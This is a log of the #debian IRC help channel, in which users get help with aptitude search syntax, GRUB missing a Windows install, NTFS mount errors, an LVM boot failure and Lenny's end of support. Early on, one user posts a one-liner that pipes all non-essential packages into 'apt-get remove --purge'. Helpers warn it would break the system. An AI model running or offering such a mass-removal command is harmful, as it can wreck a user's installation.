04:49 | -!- | gnugr [~vangelis@79.167.78.18] has joined #debian |
04:50 | -!- | gedr [~gedrty@67.130.166.175] has joined #debian |
04:51 | <gedr> | aptitude search '!?essential' - Does this show what you can remove, or what you shouldn't? Can I just parse it and remove all of them? |
04:51 | -!- | F|UxIuS [~fluxius@213-245-154-127.rev.numericable.fr] has joined #debian |
04:52 | -!- | fabrice [~fabrice@modemcable006.147-80-70.mc.videotron.ca] has quit [Read error: Operation timed out] |
04:53 | -!- | nighoo [~nighoo@141.23.85.203] has joined #debian |
04:54 | -!- | fabrice [~fabrice@modemcable006.147-80-70.mc.videotron.ca] has joined #debian |
04:54 | <gedr> | Is aptitude search '!?essential' -F '%p' --disable-columns | apt-get remove --purge a bad idea? |
04:55 | -!- | crshd [~crshd@175.141.9.121] has quit [Ping timeout: 480 seconds] |
04:55 | <XayOn> | gedr: Well, it probably IS. But depends on your needs. |
04:56 | -!- | noroot [~thereisno@h99028.upc-h.chello.nl] has joined #debian |
04:56 | <XayOn> | If you want to do it so bad, you can try, and if it breaks your system, install a debian netinstall asking to not install any package ;) |
04:57 | <polluX[W]> | will it not leave your system "blank" ? only bash and no program at all ? |
04:57 | -!- | jibel [~j-lalleme@ACaen-754-1-11-69.w90-51.abo.wanadoo.fr] has quit [Quit: Ex-Chat] |
04:57 | <XayOn> | polluX[W]: Yep, that's what he wants, It might even remove bash and leave only busybox. |
04:57 | <gedr> | Well I'd reserve something like blackbox and netcat |
04:57 | <gedr> | Yeah. |
04:57 | <SynrG> | sounds like a bit of a shotgun approach to whatever you're trying to do. is this on a fresh base install or what? |
04:57 | <gedr> | I just want a basic system... I also see here that it removes grub... |
04:57 | -!- | maria [~maria@178.139.127.117] has joined #debian |
04:58 | -!- | F|UxIuS [~fluxius@213-245-154-127.rev.numericable.fr] has quit [Quit: Quitte] |
04:58 | <gedr> | SynrG, not at all. Even so, the clean install is extremely large. |
04:58 | <gedr> | 6gb IDE |
04:58 | <SynrG> | a clean *base* install? |
04:58 | <SynrG> | er, no |
04:58 | <gedr> | SynrG, Yes. |
04:58 | -!- | imagelife [~imagelife@121.0.29.220] has joined #debian |
04:58 | <gedr> | Expert with no extras. |
04:59 | -!- | dirichlet [~ffurnari@apache.venere.it] has joined #debian |
05:00 | -!- | mode/#debian [+l 477] by debhelper |
05:00 | -!- | jibel [~j-lalleme@ACaen-754-1-11-69.w90-51.abo.wanadoo.fr] has joined #debian |
05:00 | <XayOn> | gedr: No dude, you have to select not installing base system ;) |
05:00 | <XayOn> | You probably installed base system, a clean install without base system leaves only essential packages, i do that all the time. |
05:00 | <gedr> | XayOn, Honestly I don't remember, or care. |
05:01 | <gedr> | I'd need to pull up the menu to see what I selected. |
05:01 | -!- | maria [~maria@178.139.127.117] has quit [Read error: No route to host] |
05:01 | <XayOn> | gedr: As I said, if you dont care, uninstall everything, reinstall what you think is needed, and done. If it doesn't work, reinstall and select not installing base system. |
05:02 | <gedr> | We surely don't know whether I did such or not |
05:02 | <XayOn> | Et voilá. I often install debian in old systems. |
05:02 | -!- | weland [~weland_tb@83.166.214.174] has quit [Ping timeout: 480 seconds] |
05:03 | -!- | xharx__ [~xharx@port-92-205-36-112.dynamic.qsc.de] has joined #debian |
05:03 | <SynrG> | gedr: i'm sure a fresh an install is more straightforward |
05:04 | <gedr> | SynrG, I'm gonna dig in aptitude. |
05:04 | <XayOn> | SynrG: That was for sure. |
05:04 | <gedr> | Do we know what install it is? |
05:05 | -!- | reghina [~reghina@93-46-200-90.ip109.fastwebnet.it] has joined #debian |
05:05 | <gedr> | My short term memory is horrid. |
05:05 | <reghina> | Hi |
05:05 | <XayOn> | What? |
05:05 | <reghina> | I have a problem with my monitor |
05:05 | <XayOn> | gedr: Your long term is horrid too probably. Most of us is. |
05:05 | <reghina> | I see PINK at the place of WHITE |
05:05 | <gedr> | XayOn, Well I remember commands decently... |
05:05 | <reghina> | Can you help me? |
05:05 | <XayOn> | reghina: Sounds like a bad cable to me, with blue color broken |
05:06 | -!- | pos [~mark@ppp-46-236.grapevine.net.au] has quit [Remote host closed the connection] |
05:06 | <reghina> | I do not have a cable connected..it's a lap top |
05:06 | <XayOn> | gedr: Commands, code, programming languages... yeah, but nothing else |
05:06 | <XayOn> | reghina: And, clearly, laptop screens are connected magically to the motherboard. |
05:06 | <gnugr> | gedr: before you crash your system is good to test "scrotwm" https://opensource.conformal.com/wiki/scrotwm |
05:06 | <gedr> | I blame *illegal but no addictive substance* for mine. |
05:07 | <reghina> | XayOn...ok :) |
05:07 | <XayOn> | I blame legall but addictive sustance for mine =( (caffeine) |
05:07 | -!- | xharx_ [~xharx@port-92-201-174-23.dynamic.qsc.de] has quit [Ping timeout: 480 seconds] |
05:07 | <reghina> | so ..what you think I have to do? |
05:07 | <gedr> | gnugr, should I choose that over ratpoison? |
05:07 | <XayOn> | reghina: It's quite unlikely to be a software issue. Check if it happens too on the startup screen and get it to your nearest tech service |
05:07 | <gedr> | I just hacked together a XCB wm for my needs |
05:07 | <gedr> | Except x kills me. |
05:07 | -!- | atoz-chevara [~atoz-chev@222.124.129.50] has joined #debian |
05:08 | <reghina> | it happens on the start up screen also |
05:08 | <reghina> | Ok...thank you XayOn |
05:08 | <XayOn> | reghina: Then it's a hardware issue, sorry, you'll have to replace the cable. |
05:08 | <reghina> | I understand..thanks |
05:09 | <XayOn> | I had a similar issue with mine recently, I opened the lap, sliced down the cable, and repaired it with tape |
05:10 | -!- | themill [~stuart@themill.user.oftc.net] has joined #debian |
05:10 | <reghina> | Yes..is possible to do so? |
05:11 | <reghina> | If I open the Lap, I have serious doublts if is going to close again! |
05:11 | <XayOn> | With some luck, but have in account that you'll loose warranty if you have, and you're most likely to break it if you don't know what you're doing |
05:12 | <reghina> | l'm quite sure I do not know how to do it! I didn't even know it existed a couple of minutes ago! :D |
05:13 | -!- | grandie [~grandie@p57ACFA08.dip.t-dialin.net] has joined #debian |
05:13 | -!- | ao2 [~u@2001:1418:117::1] has joined #debian |
05:14 | -!- | pos [~mark@ppp-48-51.grapevine.net.au] has joined #debian |
05:15 | -!- | reghina [~reghina@93-46-200-90.ip109.fastwebnet.it] has quit [Quit: Sto andando via] |
05:16 | <XayOn> | gedr: Are you going to release your xcb wm? =) |
05:16 | <gedr> | XayOn, not unless I fix the code. |
05:17 | -!- | Nik05 [~Nik05@s5377b589.adsl.wanadoo.nl] has joined #debian |
05:17 | <chaudhary> | how to clear frame buffer in arm board |
05:18 | <XayOn> | ... chaudhary Stop it already. |
05:19 | <XayOn> | You're already on #qt-maemo. Why you don't ask there? I guess you're cross-posting. |
05:21 | -!- | nighoo [~nighoo@141.23.85.203] has quit [Quit: cu.] |
05:22 | <XayOn> | gedr: I feel sorry for that poor code, there, alone, without anyone looking for it... you could release it and let people send their own fixes. |
05:22 | <gedr> | XayOn, I never even knew XCB existed until yesterday. |
05:22 | <gedr> | Maybe. |
05:22 | <XayOn> | gedr: Well, I knew about it a few minutes ago. |
05:22 | <gedr> | Why does grub.cfg say "Do not edit" |
05:22 | -!- | bluenemo [~bluenemo@g226034152.adsl.alicedsl.de] has joined #debian |
05:23 | <XayOn> | gedr: because its automagic |
05:23 | -!- | dirichle1 [~ffurnari@216.251.112.134] has joined #debian |
05:23 | <gedr> | Say I wanted to boot something that would never be found? |
05:23 | -!- | imagelife [~imagelife@121.0.29.220] has quit [Remote host closed the connection] |
05:24 | -!- | dirichlet [~ffurnari@apache.venere.it] has quit [Ping timeout: 480 seconds] |
05:25 | <XayOn> | gedr: there are files you can edit, in /etc/grub.d |
05:25 | -!- | zz_andres is now known as andres |
05:26 | <Infiltrator> | Otteoke: Can you clarify "my debian won't boot"? Where do you get up to? |
05:29 | -!- | melmothX_ [~melmoth@93-137-151-163.adsl.net.t-com.hr] has joined #debian |
05:30 | -!- | hardwalker [~hardwalke@122-117-115-146.HINET-IP.hinet.net] has quit [Quit: 暫離] |
05:31 | -!- | zirc [~non-avail@41.98.159.224] has joined #debian |
05:31 | -!- | melmothX [~melmoth@93-137-169-148.adsl.net.t-com.hr] has quit [Ping timeout: 480 seconds] |
05:33 | -!- | dirichle1 [~ffurnari@216.251.112.134] has quit [Ping timeout: 480 seconds] |
05:34 | -!- | weland [~weland_tb@83.166.214.174] has joined #debian |
05:34 | -!- | andres is now known as zz_andres |
05:34 | -!- | cristian [~cristian@r186-53-19-162.dialup.adsl.anteldata.net.uy] has joined #debian |
05:35 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has joined #debian |
05:35 | <cristian> | hello! |
05:36 | -!- | the-M [~the-M@TK212017102073.teleweb.at] has joined #debian |
05:36 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has quit [] |
05:36 | -!- | shanks [~shaun@89.188.9.95] has quit [Server closed connection] |
05:37 | -!- | shanks [~shaun@89.188.9.95] has joined #debian |
05:40 | -!- | cristian [~cristian@r186-53-19-162.dialup.adsl.anteldata.net.uy] has left #debian [Saliendo] |
05:41 | <Infiltrator> | !ask |
05:41 | <dpkg> | If you have a question, just ask! For example: "I have a problem with ___; I'm running Debian version ___. When I try to do ___ I get the following output ___. I expected it to do ___." Don't ask if you can ask, if anyone uses it, or pick one person to ask. We're all volunteers; make it easy for us to help you. If you don't get an answer try a few hours later or on debian-user@lists.debian.org. See <smart questions><errors>. |
05:42 | -!- | zirc [~non-avail@41.98.159.224] has quit [Ping timeout: 480 seconds] |
05:43 | -!- | Carl [~eko11ewi@jupiter-11.student.lth.se] has quit [Remote host closed the connection] |
05:43 | -!- | gedr [~gedrty@67.130.166.175] has quit [Remote host closed the connection] |
05:44 | <Infiltrator> | Does anybody know why gcc-doc is listed as non-free? |
05:44 | <XayOn> | Oo, really? |
05:44 | <XayOn> | gcc-doc-base |
05:45 | <XayOn> | This package is part of debian non-free archive because it contains gcc |
05:45 | <XayOn> | documentation files that are licenced under the terms of GFDL and do |
05:45 | <XayOn> | contain invariant sections. Distribution of such files is against DFSG. |
05:45 | -!- | zeroXten [~zeroXten@0x10.co.uk] has quit [Quit: leaving] |
05:45 | -!- | zeroXten [~zeroXten@0x10.co.uk] has joined #debian |
05:46 | -!- | grandie [~grandie@p57ACFA08.dip.t-dialin.net] has quit [Quit: Konversation terminated!] |
05:46 | -!- | Erika [~useless@modemcable003.116-202-24.mc.videotron.ca] has joined #debian |
05:46 | -!- | Lars [~Johan@jupiter-10.student.lth.se] has quit [Remote host closed the connection] |
05:47 | <Infiltrator> | Ooooh. |
05:47 | <Infiltrator> | How did you find that? |
05:48 | <XayOn> | Infiltrator: heh, http://packages.debian.org/squeeze/gcc-doc-base copyright file |
05:49 | <Infiltrator> | Also, how can I tell aptitude (or apt or whatever) to tell me which non-essential files are not-manually installed? I've gotten as far as aptitude search '~i!essential!automatic', but the !automatic bit doesn't seem to work. Neither do !auto nor !A. |
05:49 | -!- | melmothX_ [~melmoth@93-137-151-163.adsl.net.t-com.hr] has quit [Ping timeout: 480 seconds] |
05:49 | <themill> | the !essential isn't doing what you think it's doing either |
05:50 | <Infiltrator> | themill: Ah; well I fail. :P |
05:50 | <Infiltrator> | XayOn: Yeah... moving on... |
05:50 | <themill> | "aptitude search -F '%100p' '~i!~M'" should be enough; Essential:yes packages shouldn't be automatically installed anyway. |
05:51 | <themill> | (the question is whether you are using Essential in the same way as debian does, and I suspect you are not) |
05:51 | <Infiltrator> | Hm. Let me ask dpkg; one sec. |
05:52 | -!- | anton [~anton@gate-ext.inp.nsk.su] has joined #debian |
05:52 | <anton> | hallo, could you help me please? |
05:52 | -!- | grimmy [~Grimmy@81.93.86.4] has joined #debian |
05:52 | <Infiltrator> | Perhaps not, then. But that command will show me all packages that are installed (~i) and not marked as auto (~M), yes? What do the '-F' and '%100p' do? |
05:52 | <Infiltrator> | !ask |
05:52 | <dpkg> | If you have a question, just ask! For example: "I have a problem with ___; I'm running Debian version ___. When I try to do ___ I get the following output ___. I expected it to do ___." Don't ask if you can ask, if anyone uses it, or pick one person to ask. We're all volunteers; make it easy for us to help you. If you don't get an answer try a few hours later or on debian-user@lists.debian.org. See <smart questions><errors>. |
05:53 | <anton> | I have a problem with grub loader |
05:53 | -!- | melmothX [~melmoth@93-137-187-90.adsl.net.t-com.hr] has joined #debian |
05:54 | <XayOn> | Again, wich problem? |
05:54 | -!- | babilen [~babilen@babilen.user.oftc.net] has joined #debian |
05:54 | * | XayOn wonders if anton has some personal problem with grub loader and is going to smash it, or something |
05:54 | <Infiltrator> | themill: Nevermind; man aptitude told me. |
05:54 | -!- | atoz-chevara [~atoz-chev@222.124.129.50] has quit [Quit: atoz-chevara] |
05:54 | <anton> | I have both debian 5.0.9 and windows xp installed |
05:55 | <anton> | but grub doesn't see windows |
05:55 | -!- | paulio [~Paulio@pas001.connectel-cz.com] has joined #debian |
05:55 | -!- | weland [~weland_tb@83.166.214.174] has quit [Ping timeout: 480 seconds] |
05:55 | <Infiltrator> | anton: So the problem is? :P |
05:55 | * | grimmy XayOn lol |
05:56 | <anton> | i have tried to add windows entry to menu.lst manually, but it was unsuccesful |
05:56 | <Infiltrator> | themill: Sorry for asking stupid questions; it's kind of a reflex to not knowing. |
05:56 | <towo^work> | 1st, debian 5.x is eol, 2nd, i would use os-prober |
05:56 | <grimmy> | anton, type grub-update in terminal |
05:57 | <anton> | it didn't work |
05:57 | <themill> | Infiltrator: the aptitude user guide is often complete than the manual page; /msg dpkg aptitude docs; /msg dpkg aptitude search |
05:57 | <anton> | i was logged as SU |
05:57 | <XayOn> | towo^work: I've got a friend who's really sad that debian 5 died |
05:57 | -!- | zophy [~zophy@host-5-150-220-24.midco.net] has joined #debian |
05:58 | <Infiltrator> | anton: What did it say? |
05:58 | <anton> | so, maybe the problem is somehow connected with the fact i have added a new physical sata drive to my system |
05:58 | -!- | towo^work [~towo@port-212-202-129-192.static.qsc.de] has quit [Quit: und wech] |
05:58 | <anton> | i'll try it again right now |
05:59 | -!- | pos [~mark@ppp-48-51.grapevine.net.au] has quit [Read error: Operation timed out] |
05:59 | -!- | tensorpudding [~michael@99.56.172.57] has quit [Read error: Operation timed out] |
05:59 | <grimmy> | anton, get up all partitions and then update grub |
06:00 | <anton> | it said: Updating /boot/grub/menu.lst ... done |
06:00 | <Infiltrator> | anton: You said that it didn't work before? What did it say? |
06:01 | <anton> | what does "get up" mean? sorry, but i haven't heard such a term |
06:01 | <anton> | it worked without any warning messages |
06:01 | <Infiltrator> | He means make sure they're all mounted. |
06:01 | <grimmy> | anton, did you brought up all partitions? |
06:02 | <anton> | it just showed the notification Updating /boot/grub/menu.lst ... done |
06:02 | <Infiltrator> | If debian can't see them, it can't see that there's a windoze on there to list it in grub. |
06:02 | <grimmy> | anton, open all partitions in debian (even the win partitions) and then update |
06:03 | <anton> | please, wait a minute. i need to seek the word "bring up" in the dictionary |
06:03 | <Infiltrator> | anton: As I said: He means make sure they're all mounted. |
06:03 | <Infiltrator> | !tell anton about mount |
06:04 | <Infiltrator> | dpkg: You're a little lacking on info for mount... |
06:04 | <dpkg> | Infiltrator: i haven't a clue |
06:04 | <anton> | ok |
06:04 | <anton> | i understand |
06:04 | <anton> | i'll try it now |
06:04 | -!- | daniele [~daniele@87.13.202.27] has joined #debian |
06:05 | -!- | Bohr [~tna11ost@jupiter-1.student.lth.se] has quit [Quit: Leaving] |
06:06 | -!- | rage [~rage@AAmiens-157-1-87-109.w86-208.abo.wanadoo.fr] has joined #debian |
06:07 | <Infiltrator> | I have LVM set up on my laptop. Recently (past few weeks or so), about two out of three boots will fail with a message saying 'cannot find volume group blah'. A reboot (or two) solves this, though. I've seen no other issues with my disks, but could this indicate a disk failure? Or is it a kernel/software thing? |
06:09 | -!- | dirichlet [~ffurnari@apache.venere.it] has joined #debian |
06:09 | <grimmy> | Infiltrator, interesting. Did you look are there any bug reports on issue? |
06:09 | <anton> | l9-tkachev:/home/anton# mount -t ntfs /dev/sda1 /media/win_c/ |
06:09 | <anton> | mount: wrong fs type, bad option, bad superblock on /dev/sda1, |
06:09 | <anton> | missing codepage or helper program, or other error |
06:09 | <anton> | In some cases useful info is found in syslog - try |
06:09 | <anton>dmesg | tail or so |
06:09 | -!- | anton was kicked from #debian by debhelper [use http://paste.debian.net or /msg dpkg paste] |
06:10 | <daniele> | !list |
06:10 | <dpkg> | VATTENE VIA! |
06:11 | -!- | anton [~anton@gate-ext.inp.nsk.su] has joined #debian |
06:12 | <anton> | hi again |
06:12 | <grimmy> | anton, use paste.debian.net for big msg, and do you use any DE? |
06:12 | <anton> | yes |
06:13 | <daniele> | ciaooo |
06:14 | <anton> | mount command returns "Unexpected clusters per mft record (-1)" |
06:14 | <grimmy> | anton, just open/mount partitions with clicking on partitions (nautilus,or from menu) |
06:14 | <anton> | i don't see windows partition there |
06:15 | -!- | AbsintheSyringe [~havoc@chello080109101041.3.15.vie.surfer.at] has joined #debian |
06:16 | <anton> | how can i check ntfs disc for errors? |
06:16 | <grimmy> | anton, install gparted and look if you see there a win partition |
06:16 | -!- | sev [~sev@95.158.3.90] has joined #debian |
06:17 | <sev> | how do I completely disable udev autoconfiguring in xorg and make it rely only on xorg.conf ? |
06:17 | -!- | OkropNick [kuba@host-n2-72-190.telpol.net.pl] has joined #debian |
06:17 | <anton> | yes, i see my partition in gparted, but there is a "/!\" sign near it |
06:17 | -!- | chitchat [~guest@218-214-24-203.people.net.au] has joined #debian |
06:17 | -!- | tensorpudding [~michael@99.56.172.57] has joined #debian |
06:17 | -!- | Volley [~worf@hexen.cgv.tu-graz.ac.at] has joined #debian |
06:18 | <grimmy> | anton, try to mount it with gparted |
06:18 | -!- | melmothX_ [~melmoth@93-137-218-242.adsl.net.t-com.hr] has joined #debian |
06:18 | -!- | artista_frustrado [~fernando@200.247.43.2] has joined #debian |
06:18 | -!- | daniele [~daniele@87.13.202.27] has quit [Quit: Sto andando via] |
06:19 | <Infiltrator> | grimmy: Well, I'm not sure what to search against; nor what search terms to use... :\ |
06:19 | <anton> | i can't. delete, format and change flags actions are avialable only |
06:19 | -!- | real [~lalelu@invincible.geekatwork.org] has quit [Quit: .] |
06:19 | <Infiltrator> | anton: You need (I think) ntfs-tools installed to mount ntfs partitions. |
06:20 | -!- | mode/#debian [+l 485] by debhelper |
06:20 | -!- | melmothX [~melmoth@93-137-187-90.adsl.net.t-com.hr] has quit [Ping timeout: 480 seconds] |
06:20 | <bernat> | anton: testdisk will check ntfs partitions |
06:21 | <anton> | ok! i've already found it :) |
06:22 | <sev> | nvm found it |
06:22 | <sev> | Option "AutoAddDevices" "False" |
06:22 | -!- | zophy [~zophy@host-5-150-220-24.midco.net] has quit [Remote host closed the connection] |
06:23 | <grimmy> | Infiltrator, its probably kernel related error in boot process. Search forum with you kernel specifications |
06:23 | -!- | real [~lalelu@invincible.geekatwork.org] has joined #debian |
06:24 | -!- | son [~tna11dis@jupiter-12.student.lth.se] has quit [Remote host closed the connection] |
06:24 | <Infiltrator> | grimmy: Just to clarify, you mean the debian forums, yes? |
06:26 | <grimmy> | Infiltrator, ofc. Or if you find better one, let me know about it ;) |
06:27 | -!- | filePeter [~filePeter@2002:1f10:7b1a:2:619c:da21:788a:237a] has quit [Quit: leaving] |
06:28 | <Infiltrator> | grimmy: Well Linus might've started a kernel-specific forum. :P |
06:28 | -!- | max [~max@bon31-6-88-161-96-104.fbx.proxad.net] has joined #debian |
06:28 | -!- | q66 [~quaker66@213.191.105.214] has joined #debian |
06:29 | <grimmy> | Infiltrator, maybe you use liquorix kernel :p |
06:29 | <Infiltrator> | grimmy: No, my body runs on a kernel of liquor; my comp uses linux. :P |
06:30 | <Infiltrator> | Buuut this is getting OT now, methinks. :P |
06:30 | -!- | max [~max@bon31-6-88-161-96-104.fbx.proxad.net] has quit [] |
06:31 | -!- | weland [~weland_tb@83.166.214.174] has joined #debian |
06:32 | * | grimmy thinks Infiltrator has dreams about errors due to liquor :) |
06:33 | -!- | anton [~anton@gate-ext.inp.nsk.su] has quit [Quit: Leaving] |
06:34 | -!- | Paulo [~paulovaz@187.59.241.173] has joined #debian |
06:34 | -!- | carandraug [~carandrau@proxy2.library.nuigalway.ie] has joined #debian |
06:34 | -!- | EVIL_F [~EVIL@pool-74-96-32-83.washdc.east.verizon.net] has joined #debian |
06:36 | -!- | chuchi [~smuxi@227.Red-83-44-251.dynamicIP.rima-tde.net] has joined #debian |
06:36 | -!- | chuchi [~smuxi@227.Red-83-44-251.dynamicIP.rima-tde.net] has quit [Remote host closed the connection] |
06:36 | <Infiltrator> | The only topics on the forum regarding LVMs not loading are about encrypteds, and mine's not. |
06:37 | -!- | EVIL_F [~EVIL@pool-74-96-32-83.washdc.east.verizon.net] has quit [] |
06:37 | -!- | Growling_home [~glenn@duopenotti.xs4all.nl] has joined #debian |
06:38 | -!- | Growling_home [~glenn@duopenotti.xs4all.nl] has quit [] |
06:38 | <Otteoke> | does debian support usb audio DACs? |
06:38 | -!- | Paulo [~paulovaz@187.59.241.173] has quit [] |
06:38 | -!- | Paulo [~paulovaz@187.59.241.173] has joined #debian |
06:38 | -!- | PauloGVaz [~paulovaz@187.59.241.173] has joined #debian |
06:39 | -!- | Lokillo [~Lokillo@49.Red-80-24-67.staticIP.rima-tde.net] has joined #debian |
06:39 | <Lokillo> | Olaa |
06:39 | <PauloGVaz> | bom dia.. to tendo bronca em instalar o drive ati no meu note |
06:40 | -!- | troya [~troya@49.Red-80-24-67.staticIP.rima-tde.net] has joined #debian |
06:40 | <Lokillo> | jejeje ola trollaa |
06:40 | <troya> | olaaaa |
06:40 | -!- | anton [~anton@gate-ext.inp.nsk.su] has joined #debian |
06:40 | <Infiltrator> | !fr |
06:40 | <dpkg> | Pour l'aide en francais, veuillez rejoindre le canal #debian-fr. Francophone users: for help in french, please go to #debian-fr. |
06:40 | <Infiltrator> | !es |
06:40 | <retro|blah> | !pt |
06:40 | <dpkg> | Por favor use #debian-pt para ajuda em portugues ou #debian-br para ajuda em portugues do brasil. ( /join #debian-pt ) |
06:40 | <Lokillo> | nene lo save toa la clase ¿ |
06:40 | <troya> | ola anton |
06:40 | <XayOn> | In fact... |
06:41 | <XayOn> | !es |
06:41 | <dpkg> | Este canal es de soporte tecnico en Ingles para Debian. Si prefiere que el soporte sea en espanol, por favor ingrese a #debian-es con /join #debian-es tecleado en la linea de chat. |
06:41 | <troya> | creo qe si |
06:41 | <Lokillo> | quien es anton ? |
06:41 | -!- | mode/#debian [+o weasel] by ChanServ |
06:41 | <Infiltrator> | I tried, but dpkg didn't let me. :P |
06:41 | <troya> | antoñin no? |
06:41 | <XayOn> | Lokillo, troya Esto no es un canal de chorradas, no es vuestra clase, es un canal INTERNACIONAL de ayuda en debian. |
06:41 | -!- | troya was kicked from #debian by weasel [troya] |
06:41 | <anton> | testdisc doesn't have a possibility to check filesystem |
06:41 | -!- | anton was kicked from #debian by weasel [anton] |
06:41 | -!- | Lokillo was kicked from #debian by weasel [Lokillo] |
06:41 | <XayOn> | Thanks weasel. |
06:41 | <@weasel> | gah |
06:41 | -!- | periko [~periko@165.Red-88-26-158.staticIP.rima-tde.net] has joined #debian |
06:42 | -!- | gnugr [~vangelis@79.167.78.18] has quit [Quit: WeeChat 0.3.5] |
06:42 | -!- | periko [~periko@165.Red-88-26-158.staticIP.rima-tde.net] has left #debian [] |
06:42 | -!- | mode/#debian [-o weasel] by weasel |
06:43 | -!- | amarc [~amar@cm-static-13-180.telekabel.ba] has joined #debian |
06:43 | <XayOn> | Uh, I'm spanish, and their grammar was making my eyes bleed. |
06:44 | -!- | matteo [~matteo@93-43-235-176.ip94.fastwebnet.it] has joined #debian |
06:44 | -!- | zz_andres is now known as andres |
06:44 | -!- | Greg [~Greg@194.154.202.122] has joined #debian |
06:45 | -!- | anton [~anton@gate-ext.inp.nsk.su] has joined #debian |
06:45 | -!- | matteo [~matteo@93-43-235-176.ip94.fastwebnet.it] has left #debian [] |
06:45 | -!- | gnugr [~vangelis@79.167.78.18] has joined #debian |
06:45 | -!- | chattr [~mike@137.167.189.72.cfl.res.rr.com] has joined #debian |
06:46 | -!- | EagleScreen [~quassel@80.31.188.188] has joined #debian |
06:46 | -!- | AzaToth [~azatoth@93-232-96-87.cust.blixtvik.se] has joined #debian |
06:47 | -!- | anton [~anton@gate-ext.inp.nsk.su] has quit [] |
06:48 | -!- | remikp [~remikp@89-69-142-130.dynamic.chello.pl] has joined #debian |
06:48 | -!- | anton938 [~anton@gate-ext.inp.nsk.su] has joined #debian |
06:48 | -!- | tensorpudding [~michael@99.56.172.57] has quit [Remote host closed the connection] |
06:50 | -!- | mode/#debian [+l 492] by debhelper |
06:50 | -!- | remikp [~remikp@89-69-142-130.dynamic.chello.pl] has left #debian [] |
06:52 | -!- | Aledecai [~Aledecai@165.Red-88-26-158.staticIP.rima-tde.net] has joined #debian |
06:55 | -!- | zem [~voodoo@93-139-175-224.adsl.net.t-com.hr] has quit [Ping timeout: 480 seconds] |
06:55 | -!- | gnugr [~vangelis@79.167.78.18] has quit [Quit: WeeChat 0.3.6] |
06:55 | -!- | crshd [~crshd@175.141.9.121] has joined #debian |
06:56 | -!- | gnugr [~vangelis@79.167.78.18] has joined #debian |
06:58 | -!- | Rezonans [~skarasov@193.193.200.253] has joined #debian |
06:59 | -!- | Rezonans [~skarasov@193.193.200.253] has left #debian [] |
06:59 | -!- | blackshirt [~blackshir@103.3.220.47] has joined #debian |
06:59 | -!- | thunderrd [~thunderrd@110.77.242.198] has quit [Ping timeout: 480 seconds] |
07:00 | -!- | fanto666 [~fantomas@fantomas.fantomas.sk] has joined #debian |
07:00 | <fanto666> | hello, was lenny EOS time announced? It had to be 2 days ago |
07:00 | -!- | gabri [~gabri@165.Red-88-26-158.staticIP.rima-tde.net] has joined #debian |
07:01 | -!- | blackshirt [~blackshir@103.3.220.47] has quit [] |
07:01 | -!- | W4sh [~john@23.70-240-81.adsl-dyn.isp.belgacom.be] has joined #debian |
07:01 | -!- | chitchat [~guest@218-214-24-203.people.net.au] has quit [Ping timeout: 480 seconds] |
07:02 | -!- | kowloonboy [~kowloonbo@82.132.139.251] has joined #debian |
07:02 | <themill> | fanto666: yes. It was announced 2 months ago. |
07:02 | -!- | melmothX [~melmoth@93-137-176-14.adsl.net.t-com.hr] has joined #debian |
07:03 | -!- | W4sh is now known as john |
07:03 | * | kowloonboy hello everyone |
07:04 | -!- | melmothX_ [~melmoth@93-137-218-242.adsl.net.t-com.hr] has quit [Ping timeout: 480 seconds] |
07:04 | -!- | Volley [~worf@hexen.cgv.tu-graz.ac.at] has quit [Quit: Leaving] |
07:04 | <fanto666> | themill: I'm asking if there was any mail or article "lenny is end-of-support since now" |
07:05 | -!- | dpkg [~dpkg@dpkg.bot.oftc.net] has quit [Quit: buh bye!] |
07:05 | -!- | dpkg [~dpkg@dpkg.bot.oftc.net] has joined #debian |
07:05 | <fanto666> | or if anyone interested has to remember or search in list archives for prior notifications about future EOS... |
07:05 | <Infiltrator> | !tell kowloonboy about ask |
07:06 | -!- | rob [~smuxi@122-148-197-117.static.dsl.dodo.com.au] has joined #debian |
07:07 | -!- | rob is now known as Guest1915 |
07:07 | <Infiltrator> | !tell fanto666 about lenny |
07:07 | <themill> | fanto666: I'm not sure what you're looking for. A notification was sent out to the debian security list (DSA 2360-1) two months ago telling everyone that it was EOL on 2012-02-06. |
07:07 | <Infiltrator> | fanto666: I assume DSA 2360-1 is the document name? |
07:08 | <Infiltrator> | There you go. :P |
07:08 | -!- | thunderrd [~thunderrd@110.77.242.198] has joined #debian |
07:08 | -!- | PauloGVaz [~paulovaz@187.59.241.173] has quit [Quit: Saindo] |
07:08 | -!- | Paulo [~paulovaz@187.59.241.173] has quit [Quit: Saindo] |
07:09 | -!- | Guest1915 [~smuxi@122-148-197-117.static.dsl.dodo.com.au] has quit [Remote host closed the connection] |
07:10 | <Infiltrator> | Also, I think oldstable goes EOS on the first birthday of stable? Though that may not be policy. |
07:10 | <fanto666> | I've seen the mail, the issue is that I'd prefer at the time. Other story is that the Subject: of the mail was not clear enough imho (oldstable instead of lenny) |
07:11 | -!- | gudjon [~quassel@h47n2fls32o283.telia.com] has joined #debian |
07:11 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
07:12 | -!- | dtw [dtw@dsl-roibrasgw1-fe84fb00-215.dhcp.inet.fi] has joined #debian |
07:12 | <fanto666> | and I think it could be in announce too |
07:13 | <themill> | Infiltrator: that's usually what happens yes. Every time there is a discussion about "surely we can do better than that" but it doesn't amount to anything as it's fundamentally a manpower issue |
07:13 | <fanto666> | Infiltrator: I think it's the policy, however people usually do not remember what happend a year ago. I think it's like sentence should end with a dot. |
07:14 | -!- | Aledecai [~Aledecai@165.Red-88-26-158.staticIP.rima-tde.net] has quit [Remote host closed the connection] |
07:14 | -!- | melmothX [~melmoth@93-137-176-14.adsl.net.t-com.hr] has quit [Ping timeout: 480 seconds] |
07:15 | <fanto666> | but I understand it as "no, no announce was done at the EOS time, you have to remember the DSA released 2 months ago" ;-) |
07:15 | <deansu> | fanto666: there is one in the works I believe |
07:15 | -!- | gabri [~gabri@165.Red-88-26-158.staticIP.rima-tde.net] has quit [Quit: Saliendo] |
07:16 | <themill> | fanto666: Another one would normally come out around end of support time anyway; but if you managed to ignore the last one, I'm not sure that another one is really going to help... |
07:17 | -!- | grimmy [~Grimmy@81.93.86.4] has quit [Quit: jmIrc destroyed by the OS] |
07:17 | <fanto666> | deansu: pardon? |
07:17 | -!- | kowloonboy [~kowloonbo@82.132.139.251] has quit [Quit: Bye] |
07:18 | <deansu> | fanto666: a mail announcement about lenny EOL |
07:18 | -!- | jespada [~jespada@190.210.55.169] has joined #debian |
07:18 | <fanto666> | deansu: aha, great |
